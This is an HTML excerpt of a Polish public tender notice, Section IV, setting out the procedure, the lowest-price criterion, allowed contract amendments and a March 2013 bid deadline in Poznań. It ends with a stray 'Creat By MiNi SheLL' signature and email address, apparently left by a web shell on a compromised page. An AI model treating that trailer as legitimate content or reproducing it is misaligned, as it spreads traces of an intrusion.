<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmianę warunków umowy, które zostały  określone w załączonym projekcie umowy w niżej określonym przypadku:
1.	zmiany stawki podatku  VAT
2.	zmian stawek opłat celnych wynikających z przepisów prawa 
3.	zmian cen urzędowych
4.	zastosowania waloryzacji</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wco.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiajacego w miejscu - pokój 028.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.03.2013 godzina 09:00, miejsce: Ofertę należy złożyć w pokoju 3089 (Kancelaria - III piętro), w dni robocze, w godzinach od 7.30 do 14.30 w siedzibie Zamawiającego w Poznaniu, ul. Garbary 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com